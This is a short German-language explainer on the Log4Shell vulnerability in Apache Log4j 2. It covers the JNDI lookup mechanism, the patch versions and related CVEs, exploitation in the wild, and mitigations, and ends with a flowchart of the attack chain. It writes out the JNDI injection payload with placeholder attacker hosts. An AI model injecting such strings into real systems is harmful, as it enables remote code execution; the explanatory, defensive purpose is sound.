Log4Shell (CVE-2021-44228).

Log4Shell ist eine CVSS-10.0-Schwachstelle in Apache Log4j 2 (Versionen 2.0-beta9 bis 2.14.1), die von Chen Zhaojun von Alibaba Cloud an Apache gemeldet und am 9. Dezember 2021 öffentlich bekannt gegeben wurde. Die Message-Lookup-Funktion von Log4j wertete ${...}-Ausdrücke innerhalb von Log-Strings aus; ein Wert wie ${jndi:ldap://attacker/x} brachte die JVM dazu, einen JNDI-Lookup durchzuführen, eine entfernte Java-Klasse zu laden und zu deserialisieren — was Remote Code Execution zur Folge hatte. Da Log4j in unzähligen Java-Anwendungen und Appliances mitgeliefert wird, wurde jeder vom Angreifer kontrollierte Wert, der in ein Log gelangte (User-Agent, Suchfeld, Dateiname, sogar ein iPhone-Gerätename), zum Auslöser.

Das Patchen war ein mehrstufiges Wettrennen: 2.15.0 deaktivierte Lookups, war aber unvollständig (CVE-2021-45046), 2.16.0 entfernte Message-Lookups, 2.17.0 behob ein DoS-Problem (CVE-2021-45105), und 2.17.1 adressierte CVE-2021-44832 — die empfohlene fehlerbereinigte Version für Java 8. Die Massenausnutzung begann innerhalb von Stunden; CISA nahm die Schwachstelle in den KEV-Katalog auf, und sie wurde von Ransomware-Banden sowie vom iranischen Staatsakteur hinter Eindringversuchen in US-Netze missbraucht. Schutzmaßnahmen: Upgrade auf 2.17.1+ (oder 2.12.4 / 2.3.2 für ältere Java-Versionen), log4j2.formatMsgNoLookups=true setzen, die JndiLookup-Klasse entfernen, ausgehenden LDAP/RMI-Egress blockieren und eine SBOM nutzen, um jede eingebettete Kopie zu finden.

flowchart TD
  A[Angreifer] -->|"Eingabe: ${jndi:ldap://evil/x}"| B[Java-App loggt den String]
  B --> C[Log4j wertet Lookup aus]
  C --> D[JNDI-Abfrage an LDAP-Server des Angreifers]
  D --> E[Server liefert URL zu bösartiger Java-Klasse]
  E --> F[JVM lädt & deserialisiert Klasse]
  F --> G[Remote Code Execution]